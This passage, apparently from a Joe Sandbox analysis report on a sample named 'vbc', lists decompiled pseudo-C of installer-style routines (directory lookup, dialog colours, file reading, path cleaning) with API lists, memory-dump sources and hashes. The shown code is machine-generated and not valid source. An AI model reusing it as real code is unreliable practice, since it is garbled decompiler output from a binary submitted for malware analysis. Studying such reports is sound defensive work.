                    											__eflags =  *_t108;
                    											continue;
                    										}
                    										__imp__SHGetPathFromIDListW(_v8, _t108);
                    										_a8 = _t61;
                    										__imp__CoTaskMemFree(_v8);
                    										__eflags = _a8;
                    										if(_a8 != 0) {
                    											goto L26;
                    										}
                    										goto L24;
                    									}
                    									_t63 =  *_t59( *0x7a8a68,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                    									__eflags = _t63;
                    									if(_t63 == 0) {
                    										goto L26;
                    									}
                    									goto L22;
                    								}
                    								goto L26;
                    							}
                    							GetSystemDirectoryW(_t108, 0x400);
                    							goto L26;
                    						} else {
                    							E004063E8( *0x7a8a98, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8a98 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                    							if( *_t108 != 0) {
                    								L27:
                    								if(_v16 == 0x1a) {
                    									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                    								}
                    								goto L29;
                    							}
                    							E00406557(_t77, _t105, _t108, _t108, _v16);
                    							L26:
                    							if( *_t108 == 0) {
                    								goto L29;
                    							}
                    							goto L27;
                    						}
                    					}
                    					goto L43;
                    				}
                    			}





























                    0x00406557
                    0x00406557
                    0x00406557
                    0x0040655d
                    0x00406562
                    0x00406573
                    0x00406573
                    0x0040657b
                    0x0040657c
                    0x0040657d
                    0x0040657e
                    0x00406581
                    0x00406589
                    0x0040658b
                    0x0040659c
                    0x0040659f
                    0x0040659f
                    0x004065a3
                    0x004065a9
                    0x004065ac
                    0x00406787
                    0x00406787
                    0x00406792
                    0x0040679e
                    0x0040679e
                    0x00000000
                    0x004065b2
                    0x004065b7
                    0x004065cc
                    0x004065cd
                    0x004065d3
                    0x00406765
                    0x00406773
                    0x00406776
                    0x00406776
                    0x00406767
                    0x0040676a
                    0x0040676d
                    0x0040676f
                    0x0040676f
                    0x00406778
                    0x00406778
                    0x0040677e
                    0x00406781
                    0x004065b4
                    0x00000000
                    0x004065b4
                    0x00000000
                    0x00406781
                    0x004065d9
                    0x004065dc
                    0x004065eb
                    0x004065f2
                    0x004065fe
                    0x00406601
                    0x00406604
                    0x00406605
                    0x0040660a
                    0x00406610
                    0x00406613
                    0x00406616
                    0x00406709
                    0x0040670e
                    0x00406741
                    0x00406746
                    0x0040674b
                    0x00406750
                    0x00406750
                    0x00406755
                    0x0040675b
                    0x0040675e
                    0x00000000
                    0x0040675e
                    0x00406710
                    0x00406713
                    0x00406716
                    0x0040672b
                    0x00406732
                    0x00406718
                    0x0040671f
                    0x0040671f
                    0x0040673a
                    0x0040673d
                    0x00406701
                    0x00406702
                    0x00406702
                    0x00000000
                    0x0040673d
                    0x00406623
                    0x00406627
                    0x00406627
                    0x00406628
                    0x0040662a
                    0x00406667
                    0x0040666a
                    0x0040667a
                    0x0040667d
                    0x00406685
                    0x0040668b
                    0x0040668b
                    0x004066e6
                    0x004066e6
                    0x004066e8
                    0x00000000
                    0x00000000
                    0x0040668f
                    0x00406694
                    0x00406695
                    0x00406697
                    0x004066ae
                    0x004066bc
                    0x004066c2
                    0x004066c4
                    0x004066e2
                    0x004066e2
                    0x004066e2
                    0x00000000
                    0x004066e2
                    0x004066ca
                    0x004066d3
                    0x004066d6
                    0x004066dc
                    0x004066e0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004066e0
                    0x004066a8
                    0x004066aa
                    0x004066ac
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004066ac
                    0x00000000
                    0x004066e6
                    0x00406672
                    0x00000000
                    0x0040662c
                    0x0040664a
                    0x00406653
                    0x004066f0
                    0x004066f4
                    0x004066fc
                    0x004066fc
                    0x00000000
                    0x004066f4
                    0x0040665d
                    0x004066ea
                    0x004066ee
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004066ee
                    0x0040662a
                    0x00000000
                    0x004065b7

                    APIs
                    • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406672
                    • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F28,?,004055B3,007A0F28,00000000,00000000,0079BD28,7555110C), ref: 00406685
                    • lstrcatW.KERNEL32 ref: 004066FC
                    • lstrlenW.KERNEL32(Call,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Directory$SystemWindowslstrcatlstrlen
                    • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                    • API String ID: 4260037668-1230650788
                    • Opcode ID: da38963e672fb73e568923eb237ce0014ee8c8129af21826515d3029acbe5ea3
                    • Instruction ID: 9e459ffa4d797bbc81f49b8710fc234ac44c95668d32beb4df18aeb57a87e6f9
                    • Opcode Fuzzy Hash: da38963e672fb73e568923eb237ce0014ee8c8129af21826515d3029acbe5ea3
                    • Instruction Fuzzy Hash: E061D271900206AADF109F64DC40BAE37A5AF55318F22C13BE917B72D0DB7D8AA1CB5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004044DD(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                    				struct tagLOGBRUSH _v16;
                    				long _t39;
                    				long _t41;
                    				void* _t44;
                    				signed char _t50;
                    				long* _t54;
                    
                    				if(_a4 + 0xfffffecd > 5) {
                    					L18:
                    					return 0;
                    				}
                    				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                    				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                    					goto L18;
                    				} else {
                    					_t50 = _t54[5];
                    					if((_t50 & 0xffffffe0) != 0) {
                    						goto L18;
                    					}
                    					_t39 =  *_t54;
                    					if((_t50 & 0x00000002) != 0) {
                    						_t39 = GetSysColor(_t39);
                    					}
                    					if((_t54[5] & 0x00000001) != 0) {
                    						SetTextColor(_a8, _t39);
                    					}
                    					SetBkMode(_a8, _t54[4]);
                    					_t41 = _t54[1];
                    					_v16.lbColor = _t41;
                    					if((_t54[5] & 0x00000008) != 0) {
                    						_t41 = GetSysColor(_t41);
                    						_v16.lbColor = _t41;
                    					}
                    					if((_t54[5] & 0x00000004) != 0) {
                    						SetBkColor(_a8, _t41);
                    					}
                    					if((_t54[5] & 0x00000010) != 0) {
                    						_v16.lbStyle = _t54[2];
                    						_t44 = _t54[3];
                    						if(_t44 != 0) {
                    							DeleteObject(_t44);
                    						}
                    						_t54[3] = CreateBrushIndirect( &_v16);
                    					}
                    					return _t54[3];
                    				}
                    			}









                    0x004044ef
                    0x004045a5
                    0x00000000
                    0x004045a5
                    0x00404500
                    0x00404504
                    0x00000000
                    0x0040451e
                    0x0040451e
                    0x00404527
                    0x00000000
                    0x00000000
                    0x00404529
                    0x00404535
                    0x00404538
                    0x00404538
                    0x0040453e
                    0x00404544
                    0x00404544
                    0x00404550
                    0x00404556
                    0x0040455d
                    0x00404560
                    0x00404563
                    0x00404565
                    0x00404565
                    0x0040456d
                    0x00404573
                    0x00404573
                    0x0040457d
                    0x00404582
                    0x00404585
                    0x0040458a
                    0x0040458d
                    0x0040458d
                    0x0040459d
                    0x0040459d
                    0x00000000
                    0x004045a0

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                    • String ID:
                    • API String ID: 2320649405-0
                    • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                    • Instruction ID: 307f0adb03de418db05ce456a6e98ecd908ab5abab62206e0655cd74099b0a55
                    • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                    • Instruction Fuzzy Hash: 702197B1501708BFD7309F28DD08B5BBBF8AF80714B00852EEA92A22E1D738D914CB54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                    				intOrPtr _t65;
                    				intOrPtr _t66;
                    				intOrPtr _t72;
                    				void* _t76;
                    				void* _t79;
                    
                    				_t72 = __edx;
                    				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                    				_t65 = 2;
                    				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                    				_t66 = E00402D84(_t65);
                    				_t79 = _t66 - 1;
                    				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                    				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                    				if(_t79 < 0) {
                    					L36:
                    					 *0x7a8ae8 =  *0x7a8ae8 +  *(_t76 - 4);
                    				} else {
                    					__ecx = 0x3ff;
                    					if(__eax > 0x3ff) {
                    						 *(__ebp - 0x44) = 0x3ff;
                    					}
                    					if( *__edi == __bx) {
                    						L34:
                    						__ecx =  *(__ebp - 0xc);
                    						__eax =  *(__ebp - 8);
                    						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                    						if(_t79 == 0) {
                    							 *(_t76 - 4) = 1;
                    						}
                    						goto L36;
                    					} else {
                    						 *(__ebp - 0x38) = __ebx;
                    						 *(__ebp - 0x18) = E0040647A(__ecx, __edi);
                    						if( *(__ebp - 0x44) > __ebx) {
                    							do {
                    								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                    									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E004060EB( *(__ebp - 0x18), __ebx) >= 0) {
                    										__eax = __ebp - 0x50;
                    										if(E0040608D( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                    											goto L34;
                    										} else {
                    											goto L21;
                    										}
                    									} else {
                    										goto L34;
                    									}
                    								} else {
                    									__eax = __ebp - 0x40;
                    									_push(__ebx);
                    									_push(__ebp - 0x40);
                    									__eax = 2;
                    									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                    									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                    									if(__eax == 0) {
                    										goto L34;
                    									} else {
                    										__ecx =  *(__ebp - 0x40);
                    										if(__ecx == __ebx) {
                    											goto L34;
                    										} else {
                    											__ax =  *(__ebp + 0xa) & 0x000000ff;
                    											 *(__ebp - 0x4c) = __ecx;
                    											 *(__ebp - 0x50) = __eax;
                    											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                    												L28:
                    												__ax & 0x0000ffff = E00406461( *(__ebp - 0xc), __ax & 0x0000ffff);
                    											} else {
                    												__ebp - 0x50 = __ebp + 0xa;
                    												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                    													L21:
                    													__eax =  *(__ebp - 0x50);
                    												} else {
                    													__edi =  *(__ebp - 0x4c);
                    													__edi =  ~( *(__ebp - 0x4c));
                    													while(1) {
                    														_t22 = __ebp - 0x40;
                    														 *_t22 =  *(__ebp - 0x40) - 1;
                    														__eax = 0xfffd;
                    														 *(__ebp - 0x50) = 0xfffd;
                    														if( *_t22 == 0) {
                    															goto L22;
                    														}
                    														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                    														__edi = __edi + 1;
                    														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                    														__eax = __ebp + 0xa;
                    														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                    															continue;
                    														} else {
                    															goto L21;
                    														}
                    														goto L22;
                    													}
                    												}
                    												L22:
                    												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                    													goto L28;
                    												} else {
                    													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                    														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                    															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                    															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                    														} else {
                    															__ecx =  *(__ebp - 0xc);
                    															__edx =  *(__ebp - 8);
                    															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                    															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                    														}
                    														goto L34;
                    													} else {
                    														__ecx =  *(__ebp - 0xc);
                    														__edx =  *(__ebp - 8);
                    														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                    														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                    														 *(__ebp - 0x38) = __eax;
                    														if(__ax == __bx) {
                    															goto L34;
                    														} else {
                    															goto L26;
                    														}
                    													}
                    												}
                    											}
                    										}
                    									}
                    								}
                    								goto L37;
                    								L26:
                    								__eax =  *(__ebp - 8);
                    							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                    						}
                    						goto L34;
                    					}
                    				}
                    				L37:
                    				return 0;
                    			}








                    0x004026ec
                    0x004026ee
                    0x004026f1
                    0x004026f3
                    0x004026f6
                    0x004026fb
                    0x004026ff
                    0x00402702
                    0x00402705
                    0x00402c2a
                    0x00402c2d
                    0x0040270b
                    0x0040270b
                    0x00402712
                    0x00402714
                    0x00402714
                    0x0040271a
                    0x0040287e
                    0x0040287e
                    0x00402881
                    0x00402886
                    0x004015b6
                    0x0040292e
                    0x0040292e
                    0x00000000
                    0x00402720
                    0x00402721
                    0x0040272c
                    0x0040272f
                    0x0040273b
                    0x0040273f
                    0x004027d7
                    0x004027ef
                    0x004027ff
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00402745
                    0x00402745
                    0x00402748
                    0x00402749
                    0x0040274c
                    0x00402751
                    0x00402758
                    0x00402760
                    0x00000000
                    0x00402766
                    0x00402766
                    0x0040276b
                    0x00000000
                    0x00402771
                    0x00402771
                    0x00402779
                    0x0040277c
                    0x0040277f
                    0x0040283a
                    0x00402841
                    0x00402785
                    0x0040278b
                    0x00402797
                    0x00402801
                    0x00402801
                    0x00402799
                    0x00402799
                    0x0040279c
                    0x0040279e
                    0x0040279e
                    0x0040279e
                    0x004027a1
                    0x004027a6
                    0x004027a9
                    0x00000000
                    0x00000000
                    0x004027ab
                    0x004027ae
                    0x004027bc
                    0x004027c2
                    0x004027d0
                    0x00000000
                    0x004027d2
                    0x00000000
                    0x004027d2
                    0x00000000
                    0x004027d0
                    0x0040279e
                    0x00402804
                    0x00402807
                    0x00000000
                    0x00402809
                    0x0040280e
                    0x0040284f
                    0x00402871
                    0x00402878
                    0x0040285d
                    0x0040285d
                    0x00402860
                    0x00402863
                    0x00402866
                    0x00402866
                    0x00000000
                    0x00402817
                    0x00402817
                    0x0040281a
                    0x0040281d
                    0x00402823
                    0x00402827
                    0x0040282a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040282a
                    0x0040280e
                    0x00402807
                    0x0040277f
                    0x0040276b
                    0x00402760
                    0x00000000
                    0x0040282c
                    0x0040282c
                    0x0040282f
                    0x00402838
                    0x00000000
                    0x0040272f
                    0x0040271a
                    0x00402c33
                    0x00402c39

                    APIs
                    • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                      • Part of subcall function 004060EB: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026D1,00000000,00000000,?,00000000,00000011), ref: 00406101
                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: File$Pointer$ByteCharMultiWide$Read
                    • String ID: 9
                    • API String ID: 163830602-2366072709
                    • Opcode ID: 588ede5e84484d8860c92fb66ffae47e610f47b9ca95ac382e9d1b4b4742ae18
                    • Instruction ID: be08228a48e351455db253d3f5410474da148bca98ac48c4339161726040cff4
                    • Opcode Fuzzy Hash: 588ede5e84484d8860c92fb66ffae47e610f47b9ca95ac382e9d1b4b4742ae18
                    • Instruction Fuzzy Hash: 89510A75D00219AADF20EFD5CA88AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E004067A1(WCHAR* _a4) {
                    				short _t5;
                    				short _t7;
                    				WCHAR* _t19;
                    				WCHAR* _t20;
                    				WCHAR* _t21;
                    
                    				_t20 = _a4;
                    				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                    					_t20 =  &(_t20[4]);
                    				}
                    				if( *_t20 != 0 && E00405E60(_t20) != 0) {
                    					_t20 =  &(_t20[2]);
                    				}
                    				_t5 =  *_t20;
                    				_t21 = _t20;
                    				_t19 = _t20;
                    				if(_t5 != 0) {
                    					do {
                    						if(_t5 > 0x1f &&  *((short*)(E00405E16(L"*?|<>/\":", _t5))) == 0) {
                    							E00405FC5(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                    							_t19 = CharNextW(_t19);
                    						}
                    						_t20 = CharNextW(_t20);
                    						_t5 =  *_t20;
                    					} while (_t5 != 0);
                    				}
                    				 *_t19 =  *_t19 & 0x00000000;
                    				while(1) {
                    					_push(_t19);
                    					_push(_t21);
                    					_t19 = CharPrevW();
                    					_t7 =  *_t19;
                    					if(_t7 != 0x20 && _t7 != 0x5c) {
                    						break;
                    					}
                    					 *_t19 =  *_t19 & 0x00000000;
                    					if(_t21 < _t19) {
                    						continue;
                    					}
                    					break;
                    				}
                    				return _t7;
                    			}








                    0x004067a3
                    0x004067ac
                    0x004067c3
                    0x004067c3
                    0x004067ca
                    0x004067d6
                    0x004067d6
                    0x004067d9
                    0x004067dc
                    0x004067e1
                    0x004067e3
                    0x004067ec
                    0x004067f0
                    0x0040680d
                    0x00406815
                    0x00406815
                    0x0040681a
                    0x0040681c
                    0x0040681f
                    0x00406824
                    0x00406825
                    0x00406829
                    0x00406829
                    0x0040682a
                    0x00406831
                    0x00406833
                    0x0040683a
                    0x00000000
                    0x00000000
                    0x00406842
                    0x00406848
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406848
                    0x0040684d

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Char$Next$Prev
                    • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                    • API String ID: 589700163-3083651966
                    • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                    • Instruction ID: df5be6298df38fe53a3c1647d4a953459580f705d81a6df7816dadf9acb4bb56
                    • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                    • Instruction Fuzzy Hash: C0110D2680161295DB3037149D84A7766F8EF58BA4F56803FED86732C0F77C4C9286BD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00404E31(struct HWND__* _a4, intOrPtr _a8) {
                    				long _v8;
                    				signed char _v12;
                    				unsigned int _v16;
                    				void* _v20;
                    				intOrPtr _v24;
                    				long _v56;
                    				void* _v60;
                    				long _t15;
                    				unsigned int _t19;
                    				signed int _t25;
                    				struct HWND__* _t28;
                    
                    				_t28 = _a4;
                    				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                    				if(_a8 == 0) {
                    					L4:
                    					_v56 = _t15;
                    					_v60 = 4;
                    					SendMessageW(_t28, 0x113e, 0,  &_v60);
                    					return _v24;
                    				}
                    				_t19 = GetMessagePos();
                    				_v16 = _t19 >> 0x10;
                    				_v20 = _t19;
                    				ScreenToClient(_t28,  &_v20);
                    				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                    				if((_v12 & 0x00000066) != 0) {
                    					_t15 = _v8;
                    					goto L4;
                    				}
                    				return _t25 | 0xffffffff;
                    			}














                    0x00404e3f
                    0x00404e4c
                    0x00404e52
                    0x00404e90
                    0x00404e90
                    0x00404e9f
                    0x00404ea6
                    0x00000000
                    0x00404ea8
                    0x00404e54
                    0x00404e63
                    0x00404e6b
                    0x00404e6e
                    0x00404e80
                    0x00404e86
                    0x00404e8d
                    0x00000000
                    0x00404e8d
                    0x00000000

                    APIs
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E4C
                    • GetMessagePos.USER32 ref: 00404E54
                    • ScreenToClient.USER32(?,?), ref: 00404E6E
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E80
                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EA6
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Message$Send$ClientScreen
                    • String ID: f
                    • API String ID: 41195575-1993550816
                    • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                    • Instruction ID: da5f2d6a974e9c572a85d9e94ff0a86548add23bfd296e24df18a92b611d7590
                    • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                    • Instruction Fuzzy Hash: 2F018C71900219BADB00DBA4DD81BFEBBBCAB94710F10002BBB10B61C0C7B4AA018BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                    				short _v132;
                    				int _t11;
                    				int _t20;
                    
                    				if(_a8 == 0x110) {
                    					SetTimer(_a4, 1, 0xfa, 0);
                    					_a8 = 0x113;
                    				}
